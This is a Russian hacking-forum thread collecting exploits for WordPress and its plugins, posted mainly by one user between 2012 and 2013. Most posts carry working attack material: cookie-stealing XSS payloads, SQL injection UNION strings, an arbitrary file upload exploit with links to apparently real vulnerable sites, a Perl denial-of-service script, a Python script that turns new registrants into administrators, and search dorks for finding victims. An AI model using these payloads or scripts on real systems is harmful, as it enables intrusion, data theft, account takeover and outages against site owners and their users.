1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Уязвимости WordPress

Тема в разделе "Уязвимости популярных CMS", создана пользователем onthar, 21 окт 2009.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities

    Код:
    ##############################################################################
    Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities
    
    author...............: Mehmet Ince
    twitte...............: https://twitter.com/#!/mmetince
    mail.................: mehmet.ince@bga.com.tr
    software link........: http://www.zingiri.com
    affected versions....: tested on 2.3.0 and 2.4.0
    # Exploit Title: Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS
    Vulnerabilities
    # Google Dork:
    # Date: 26 Apr 2012
    # Author: Mehmet INCE
    # Software Link:
    http://downloads.wordpress.org/plugin/zingiri-web-shop.2.4.0.zip
    # Version: 2.4.0 and older.
    # Tested on: version of 2.3.0 and 2.4.0 with Ubuntu 11.10 Server with
    Firefox browser.
    ##############################################################################
    /*
    ## BASIC XSS
    PS: Exploitable without Authentication

    Код:
    plugins/zingiri-web-shop/zing.inc.php
    line at 401.

    Код:
    if ($process=='content' && $page!='ajax' && $page!='downldr') echo '<div
    class="zing_ws_page" id="zing_ws_'.$_GET['page'].'">';
    Exploit:
    Код:
    http://localhost/wordpress/?page=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
    'page' variable isn't properly sanitized before being used.


    ## STORED XSS
    PS: Attacker should be logged for exploit.

    Код:
    ./fws/pages-front/onecheckout.php
    line 27-29

    Код:
    if (!empty($_POST['notes'])) {
    $notes=$_POST['notes'];
    }
    and line 348
    Код:
    <textarea name="notes" rows="5" style="width: 100%"><?php echo
    $notes;?></textarea><br />
    'notes' variable isn't properly sanitized before being used.

    */

    step 1: Login to wordpress.

    step 2: Go to "Shop" menu. It's should be stay at banner.


    Код:
    http://6.6.6.102/wordpress/?page_id=14
    step 3: Than you'll see list ot items. Click one of them.

    Код:
    http://6.6.6.102/wordpress/?page=details&prod=2&cat=1&page_id=14
    step 4: You can pass that form action. That wont be problem..! Click to
    "Order" button.


    step 5: There is confirmation about the Shopping. Click "checkout" to pass
    that page.


    step 6: It's final stage. Put you javascript payload to "Additional
    comments/questions" form. After you click checkout button, that form will
    get all of these input data with POST method.


    step 7: Click to "Checkout"
     
    1 май 2012
    1 человеку нравится это.
  2. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress Download Monitor 3.3.5.4 Cross Site Scripting


    Module: WordPress Download Monitor
    url: http://wordpress.org/extend/plugins/download-monitor/

    EXPLOIT:
    Код:
    http://wp.bacon/wp-content/plugins/download-monitor/uploader.php?tab=add
    tags="scriptalert(1)/script
    or
    Код:
    http://wp.bacon/wp-content/plugins/download-monitor/uploader.php?tab=add
    thumbnail="scriptalert(1)/script
    or
    Код:
    http://wp.bacon/wp-content/plugins/download-monitor/uploader.php?tab=downloadss=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
    Пофиксить баг можно обновлением плагина до последней версии

    source: http://packetstormsecurity.org/files/112707/wpdownloadmonitor-xss.txt
     
    Последнее редактирование: 18 май 2012
    18 май 2012
    1 человеку нравится это.
  3. Hostgame
    Hostgame Новичок
    Симпатии:
    9
    Код:
    # Exploit Title: Buddypress plugin of Wordpress remote SQL Injection
    # Date: March 31, 2012
    # Author: Ivan Terkin
    # Exploitation: Remote Exploit
    # Bug: Remote SQL Injection
    # Software Link: buddypress.org
    # Version: till 1.5.5
    # Tested on: Buddypress 1.5.4
     
     
    POST /wp-load.php HTTP/1.1
    User-Agent: Mozilla
    Host: example.com
    Accept: */*
    Referer: http://example.com/activity/?s=b
    Connection: Keep-Alive
    Content-Length: 153
    Content-Type: application/x-www-form-urlencoded
     
    action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(  3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14  ),(15),(16),(17))%3b--+
     
    Reported to developers and fixed in version 1.5.5
     
    18 май 2012
    2 пользователям это понравилось.
  4. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress Website FAQ Plugin v1.0 SQL Injection​


    Код:
    # Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
    # Date: 6/25/12
    # Exploit Author: Chris Kellum
    # Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
    # Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
    # Version: 1.0
    Vulnerability location:
    Код:
    /wp-content/plugins/website-faq/website-faq-widget.php
    Код:
              function displayAnswer()
              {
             global $wpdb;
                 $master_table = $wpdb->prefix . "faq";
             $category = $_POST['category'];
             $searchtxt = $_POST['searchtxt'];
             if($category!=0)
             {
                $sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND  faq_question LIKE '%".$searchtxt."%'";
             }
    

    Vulnerability Details: faq_category vulnerable to SQL injection

    When submitting a query via the widget, intercept the post request via burp or other proxy to find the following:

    Код:
    action=displayAnswer&category=1&searchtxt=[your query]
    Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value.

     
    27 июн 2012
  5. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress AdRotate 3.7.3.5 Cross Site Scripting​


    Homepage: http://wordpress.org/extend/plugins/adrotate/

    Vulnerable Module(s):
    [+] Add New
    [+] Manage

    Vulnerable Parameter(s):
    [+] Title

    Proof of Concept:

    Review: adrotateindex title - Listing

    Код:
    <tr id="adrotateindex" class="alternate row_error">
    <th class="check-column"><input name="errorbannercheck[]" value="1"
    type="checkbox"></th>
    <td><center>1</center></td>
    <td>August 16, 2012</td>
    <td><span style="color: #009900;">November 08, 2012</span></td>
    <td><strong><a class="row-title"
    href="http://173.0.61.44/video/wp-admin/admin.php?page=adrotate&
    view=edit&ad=1" title="Edit">"><[PERSISTENT INJECTED SCRIPT CODE!]")'
    <<="" a="">&lt;/strong&gt;
    - &lt;a 
    href="http://173.0.61.44/video/wp-admin/admin.php?page=adrotate&amp;view=report&amp;ad=1"
    title="Report"&gt;Report&lt;/a&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;/tbody&gt;
    &lt;/table&gt;
    &lt;/form&gt;
    &lt;h3&gt;Active Ads&lt;/h3&gt;

    Reference(s):
    Код:
    http://site.com/wp-admin/admin.php?page=adrotate&view=addnew
    
    Код:
    http://site.com/wp-admin/admin.php?page=adrotate&view=manage
    (c) [noparse]http://www.vulnerability-lab.com/get_content.php?id=690[/noparse]
     
    8 сен 2012
    1 человеку нравится это.
  6. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    WordPress TDO Mini Forms Arbitrary File Upload​


    Код:
    # Exploit Title: Wordpress "TDO Mini Forms" File Upload Vulnerability
    
    # Google Dork: "tdomf-upload-inline.php?tdomf_form_id=1 index"
    
    # Date: 31/9/12
    
    # Exploit Author: HodLuM
    
    # Vendor Homepage: unknown
    
    # Software Link: http://thedeadone.net/download/tdo-mini-forms-wordpress-plugin/
    
    # Version: All
    
    # Tested on: 2.x.x to 3.x.x
    # Email: h0dlmx@yahoo.com - hodlum@live.com


    Exploit:

    Код:
    site.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

    Uploaded files go to:

    Код:
    site.com/wp-content/plugins/tdo-mini-forms/attachments/FILE.*
    Demo:
    Код:
    http://waqtnews.tv/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
    Код:
    http://funnyfuntoosh.com/blogs/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
    Код:
    http://ideabank.utm.my/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
    Код:
    http://www.mormonmissionprep.com/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
     
    10 сен 2012
  7. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Wordpress Login Page Denial of Service

    Код:
    #!/usr/bin/perl
    #####################################
    # Wordpress Login Page Denial of Service
    # Code Written By Amir
    # Www.IrIsT.Ir
    # Greats : B3HZ4D - nimaarek - Mikili - Dead.Zone - C0dex - TaK.FaNaR - Nafsh
    #####################################
    use IO::Socket;
    
    $host = $ARGV[0];
    $path = $ARGV[1];
    
    if(!$ARGV[1])
    {
    print "################################################# \n";
    print "## Wordpress Login Page Denial of Service\n";
    print "## Discoverd By Amir \n";
    print "## Www.IrIsT.Ir \n";
    print "################################################# \n";
    print "## [host] [path] \n";
    print "## host.com /Wordpress\n";
    print "################################################# \n";
    exit();
    }
    for($i=0; $i<99999; $i++)
    {
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
    $post = "action=rp&key=1111111111111111111111111111111111111&login=True";
    $pack.= "POST " .$path. "/wp-login.php HTTP/1.1\r\n";
    $pack.= "Host: " .$host. "\r\n";
    $pack.= "User-Agent: Googlebot/2.1\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: " .length($post). "\r\n\r\n";
    $pack.= $post;
    print $socket $pack;
    syswrite STDOUT, "+";
    }
     
    11 сен 2012
  8. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Wordpress - Multiple XSS Vulnerability

    Код:
    ./Title Exploit : Wordpress - Multiple XSS Vulnerability
     ./CMS Version   : Wordpress v.3.4.2 (Last Version)
     ./WebApps URL   : http://www.wordpress.org/
     ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
     ./Security Risk : [ High Level ]
     ./Category XPL  : [ WebApps/ZeroDay ]
     ./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
     ./Time & Date   : September, 17 2012. 10:27 AM. Jakarta, Indonesia.
    Код:
     |||                        -=[ Use It At Your Risk ]=-                        |||
     |||               This Was Written For Educational Purpos Only                |||
     |||               Author Will Be Not Responsible For Any Damage               |||

    [ Information Content ]

    [ Vulnerability Details ]
    • 1.1 Vulnerability XSS WP-Post.
    • 1.2 Vulnerability XSS WP-Page.
    • 1.3 Vulnerability XSS WP-MediaLibrary.

    [ XSS CODE ]
    Код:
    <script>alert('31337');</script>
    <script>alert(document.cookie);</script>
     <script>window.open("http://www.google.com/")</script>
    [ Exploit Report ]

    1.2. Create / Edit WP-Page:

    1.3. Add / Edit WP-Media Library:

    Script XSS will be Affected:
     
    18 сен 2012
  9. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Код:
    # Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
    # Date: Sept 29, 2012
    # Exploit Author: bwall (@bwallHatesTwits)
    # Vendor Homepage: http://themeforest.net/user/wptitans
    # Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
    # Version: 3.2
    # Tested on: Ubuntu
    import httplib, urllib
    
    #target site
    site = "10.10.10.5"
    #path to ajax.php
    url = "/wordpress/wp-content/themes/archin/hades_framework/option_panel/ajax.php"
    
    def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
    
    ChangeOption(site, url, "admin_email", "fake@ballastsecurity.net")
    ChangeOption(site, url, "users_can_register", "1")
    ChangeOption(site, url, "default_role", "administrator")
    print "Now register a new user, they are an administrator by default!"
     
    2 окт 2012
  10. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Wordpress spider calendar Plugin Multiple Vulnerabilities

    Код:
    Dork: N/A
     
     Date: [02-10-2012]
     
     Author: Daniel Barragan "D4NB4R"
     
     Twitter: @D4NB4R
     
     Vendor: http://wordpress.org/extend/plugins/spider-calendar/
     
     Version: 1.0.1
     
     License: Non-Commercial
    
     Demo: http://wpdemo.web-dorado.com/spider-calendar/
    
     Download: http://downloads.wordpress.org/plugin/spider-calendar.zip
      
     Tested on: [Linux(bt5)-Windows(7ultimate)]
    
     Especial greetz:  _84kur10_, nav, dedalo, ksha, shine, p0fk, the_s41nt
    Exploit:

    XSS : Cross-site scripting

    Код:
    http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig.php?calendar_id=1&cur_page_url=&date=D4NB4R'"()%26%251<ScRiPt >prompt()<%2fScRiPt>&day=01&ev_ids=1&eventID=1&theme_id=5
    Код:
    http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,0x3c7363726970743e616c657274282244344e42345220576173204865726522293c2f7363726970743e,1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=http://127.0.0.1/spider-calendar/

    SQL : SQL injection

    Код:
    http://127.0.0.1//wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?theme_id=5&ev_ids=1&calendar_id=null union all select 1,1,1,1,version(),1,1,1,1,1,1,1,1,1,1,1,1+--+&date=2012-10-10&many_sp_calendar=1&cur_page_url=

    HPP : HTTP Parameter Pollution (HPP)

    Код:
    http://127.0.0.1/wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5%26D4NB4R%3dD4NB4R >> 127.0.0.1//wp-content/plugins/Calendar/front_end/spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5&d4nb4r=d4nb4r
    source:bugsearch​
     
    9 окт 2012
  11. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Wordpress 3.4 Cross-Site Scripting Vulnerability

    Код:
    #############################
    #
    # Exploit Title : Wordpress 3.4 Cross-Site Scripting Vulnerability
    #
    # Author : IrIsT.Ir
    #
    # Discovered By : Am!r
    #
    # Home : http://IrIsT.Ir/forum/
    #
    # Software Link : http://wordpress.org
    #
    # Security Risk : High
    #
    # Version : All Version
    #
    # Tested on : GNU/Linux Ubuntu - Windows Server - win7
    #
    # Dork : intext:"Powered By Wordpress"
    #
    #############################
    #
    # Expl0iTs :
    #
    # [Target]/wp-cron.php?doing_wp_cron=[Xss]
    #
    #
    # C0de :
    #
    # $doing_wp_cron = $_GET[ 'doing_wp_cron' ];
    
    #
    #
    #############################
     
    30 окт 2012
  12. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    50
    WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability

    [+] WordPress SEO Plugin 1.3.11 Cross Site Script XSS
    [+] Found by Angel Injection
    [+] Version: 1.3.11

    Exploit:

    Код:
    http://localhost/?s=[xss here]&x=0&y=0
     
    http://localhost/?s="><script>alert(1)</script>&x=0&y=0
     
    10 дек 2012
    1 человеку нравится это.
  13. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    50
    Wordpress 3.5 Active XSS

    Нужны права администратора.


    Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:

    Код:
    "><script>alert('XSS Test')</script>
    [​IMG]

    Проверить можно тут.

    Код:
    L: test
    P: test
    (c) n3m1s
     
    Последнее редактирование: 18 дек 2012
    17 дек 2012
    1 человеку нравится это.
  14. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    50
    Wordpress 3.5 Full Path Disclosure

    Exploit:

    Код:
    localhost/?cat[]=1
    Result:

    Код:
    Warning: urldecode() expects parameter 1 to be string, array given in *path* on line 1735
    Vulnerable code:

    Код:
    $q['cat'] = ''.urldecode($q['cat']).'';
    Example:

    Код:
    _tpp://sergeybiryukov.ru/?cat[]=1
    _ttp://wpsymposium.com/?cat[]=1
    Found by n3m1s
     
    Последнее редактирование: 18 дек 2012
    18 дек 2012
    1 человеку нравится это.
  15. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Код:
    ##############
    # Exploit Title : Wordpress RLSWordPressSearch plugin SQL Injection
    #
    # Exploit Author : Ashiyane Digital Security Team
    #
    # Home : ww.ashiyane.org
    #
    # Security Risk : MEdium - SQL Injection
    #
    # Dork : inurl:wp-content/plugins/RLSWordPressSearch/register.php?a=
    #
    ##############
    #Location:site/wp-content/plugins/RLSWordPressSearch/register.php?a=[num]&agentid=[SQL]
    #
    #
    ##############
    #Greetz to: My Lord ALLAH
    ##############
    #
    # Amirh03in
    #
    ##############
    
     
    31 янв 2013

Поделиться этой страницей

Загрузка...